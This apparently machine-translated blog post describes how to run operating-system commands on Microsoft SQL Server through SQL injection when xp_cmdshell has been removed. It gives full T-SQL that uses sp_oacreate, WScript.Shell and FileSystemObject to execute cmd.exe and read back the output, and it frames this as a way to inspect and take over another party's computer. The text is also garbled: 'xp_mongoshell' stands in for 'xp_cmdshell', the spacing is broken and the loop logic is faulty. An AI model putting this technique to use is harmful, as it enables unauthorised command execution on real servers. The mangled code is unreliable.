Run cmd commands on SQL servers with injection vulnerabilities without xp_cmdshell.

An article in my blog introduces the basic principles and methods of SQL injection. Perhaps the most interesting thing is to use the extended stored procedure xp_mongoshell to run the console commands of the operating system. This method is also very simple. You only need to use the following SQL statement:

Exec master. DBO. xp_mongoshell 'dir C :/'

However, more and more database administrators are aware of the potential danger of this extended stored procedure. They may delete or rename the Dynamic Linked Library xplog70.dll file of this stored procedure, at this time, many people may give up, because we cannot run any cmd command, it is difficult to view the files, directories, open services of the other computer, nor can we add nt users.

After some research, I found that even if xp_mongoshell is unavailable, it is still possible to run cmd on the server and get the echo result, the SQL Server has several other system stored procedures: sp_oacreate, sp_oagetproperty, and sp_oamethod. The premise is that wscript. Shell and scripting. FileSystemObject on the server are available.
Sp_oacreate
In Microsoft? SQL Server? Create an OLE object instance on the instance.
Syntax
Sp_oacreate progid, CLSID,
Objecttoken output
[, Context]
Sp_oagetproperty
Obtains the attribute value of an OLE object.
Syntax
Sp_oagetproperty objecttoken,
Propertyname
[, Propertyvalue output]
[, Index...]
Sp_oamethod
Call the method of the OLE object.
Syntax
Sp_oamethod objecttoken,
Methodname
[, Returnvalue output]
[, [@ Parametername =] parameter [Output]
[... N]

Ideas:
Create a wscript on SQL Server first. shell, call its run method, output the execution result of cmd.exe to a file, and then create a scripting. fileSystemObject creates a textstream object, reads the characters in the temporary file, and adds one row to a temporary table.

The following are the corresponding SQL statements:

Create Table mytmp (Info varchar (400), Id identity (1, 1) not null)
Declare @ shell int
Declare @ FSO int
Declare @ file int
Declare @ isend bit
Declare @ out varchar (400)
Exec sp_oacreate 'wscript. shell', @ shell output
Exec sp_oamethod @shell,'run', null,'cmd.exe/C dir C:/> C:/temp.txt ', '0', 'true'
-- Note that the run parameter true indicates the result of waiting for the program to run. This parameter must be used for long-time commands similar to ping.

Exec sp_oacreate 'scripting. FileSystemObject ', @ FSO output
Exec sp_oamethod @ FSO, 'opentextfile', @ file out, 'c:/temp.txt'
-- Because the FSO opentextfile method returns a textstream object, @ file is an object token.

While @ shell> 0
Begin
Exec sp_oamethod @ file, 'readline', @ out
Insert into mytmp (Info) values (@ out)
Exec sp_oagetproperty @ file, 'endofstream', @ isend out
If @ isend = 1 break
Else continue
End

Drop table mytmp